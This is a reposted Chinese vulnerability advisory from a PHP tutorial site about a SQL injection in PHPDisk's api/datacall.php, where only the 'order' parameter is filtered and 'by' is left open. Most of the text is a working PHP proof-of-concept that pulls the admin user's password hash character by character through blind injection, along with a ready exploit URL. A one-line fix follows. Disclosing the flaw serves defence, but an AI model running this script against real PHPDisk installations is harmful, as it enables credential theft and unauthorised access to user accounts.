来源:自学PHP网 时间:2015-04-17 11:59 作者: 阅读:次
[导读] 在phpdisk/api/datacall.php中有一段代码:$order = trim(gpc(#39;order#39;,#39;G#39;,#39;#39;));$by = trim(gpc(#39;by#39;,#39;G#39;,#39;#39;));$limit = (int)gpc(#39;limit#39;,#39......
|
在phpdisk/api/datacall.php
中有一段代码:
$order = trim(gpc('order','G',''));
$by = trim(gpc('by','G',''));
$limit = (int)gpc('limit','G',0);
if(!$type || !$order || !$by || !$limit){
echo 'PHPDisk Datacall Parameter is null or Error!';
exit;
}
$filter_arr = array('select','delete','update','insert');
for($i=0;$i<count($filter_arr);$i++){
if(strpos($order,strtolower($filter_arr[$i]))!==false){
die('PHPDisk Datacall Parameter Error!');
}
}
if($type=='user'){
echo '<ul>'.LF;
$q = $db->query("select username,userid from {$tpf}users order by $order $by limit $limit");
$order和$by进入了query查询,看的出来作者想到了可能会有人在order里提交query,但是他没想到在不提交order,在by里提交一样可以注射。
漏洞证明:
 <?php
$file = 'http://localhost/phpdisk/api/datacall.php';
for($i=0;$i<32;$i++) {
$path = $i+1;
foreach(array('a','b','c','d','e','f',0,1,2,3,4,5,6,7,8,9) as $w) {
$api = $file.'?type=user&by='.urlencode('(if(((select substring(password,'.$path.',1) from pd_users where userid=1)=0x'.bin2hex($w).'),userid,username))').'&order=/**/&limit=1';
if(strpos(file_get_contents($api),'admin')!==false) {
echo $w;
break;
} www.2cto.com
}
}
//http://localhost/phpdisk/api/datacall.php?type=user&by=if%28%28%28select%201%20from%20pd_users%20where%20userid=1%20limit%201%29=2%29,userid,username%29&order=/**/&limit=1
?>
修复方案:
只允许a-z的order和by
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com
